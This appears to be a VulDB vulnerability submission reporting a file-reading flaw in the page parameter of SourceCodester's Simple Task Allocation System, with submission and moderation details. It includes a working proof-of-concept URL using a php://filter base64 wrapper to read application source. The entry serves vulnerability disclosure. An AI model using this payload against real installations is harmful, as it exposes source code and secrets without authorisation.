| Title | There is a file reading vulnerability in index.php of Simple Task Allocation System |
|---|
| Description | The page parameter in line 77 of Simple Task Allocation System's index.php is controllable, and users can construct malicious urls to achieve high-risk vulnerabilities in file reading
http://127.0.0.1/php-sqlite-task-allocation-system/?page=users
can be constructed as
http://127.0.0.1/php-sqlite-task-allocation-system/?page=php://filter/read=convert.base64-encode/resource=users
source url:https://www.sourcecodester.com/php/16358/simple-task-allocation-system-using-php-and-sqlite-source-code-free-download.html |
|---|
| Source | ⚠️ https://github.com/Pe4cefulSnow/CVE-Advisory/blob/main/uploadcve.md |
|---|
| User | Pe4cefulSnow (UID 34389) |
|---|
| Submission | 03/31/2023 11:32 (3 years ago) |
|---|
| Moderation | 04/01/2023 10:39 (23 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 224724 [SourceCodester Simple Task Allocation System 1.0 index.php page information disclosure] |
|---|
| Points | 20 |
|---|